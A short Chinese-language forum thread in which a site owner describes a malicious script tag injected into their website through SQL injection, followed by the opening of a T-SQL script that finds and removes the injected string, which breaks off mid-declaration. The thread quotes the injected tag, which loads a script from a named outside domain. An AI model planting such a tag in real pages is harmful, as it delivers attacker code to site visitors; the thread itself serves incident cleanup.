有没有人知道有关此攻击的更多信息?
我最近在我的网站上注入了这个脚本
顺便说一句,不要去这个网站,因为它是感染的来源
</title><script src=http://google-stats50.**fo/***.php>
什么样的攻击,SQL或CODE?
顺便说一句,不要去这个网站,因为它是感染的来源
问题是这种传染性攻击发生了什么样的攻击?
我们发现它,并不像twitter攻击,它是通过url中的请求参数并直接在参数中注入sql.
我们的sql团队生成了一个SQL脚本来清理被感染的数据库
/*************************************************************************
SQL INJECTED DATABASE
*************************************************************************/
DECLARE @dbName VARCHAR(200),
@SqlString NVARCHAR(MAX),
@SearchText VARCHAR(MAX),
@SearchTextLike VARCHAR(MAX),
@NbItems INT,
@TableName VARCHAR(255),
@ColoneName VARCHAR(255),
@objId BIGINT,
@tmpSqlString NVARCHAR(MAX),
@CleanUp BIT,
@RowCount BIGINT,
@debug BIT,
@Msg VARCHAR(MAX);
SET @debug = 0; -- 1 = Additionnal prints
SET @CleanUp = 0; -- 1 = Update tables
SET @SearchText = '</title><script src=http://google-stats50.info/ur.php></script>';
SET @SearchTextLike = '%' + @SearchText + '%';
DECLARE @QueryResults TABLE (SqlString VARCHAR(MAX), TableName VARCHAR(255), …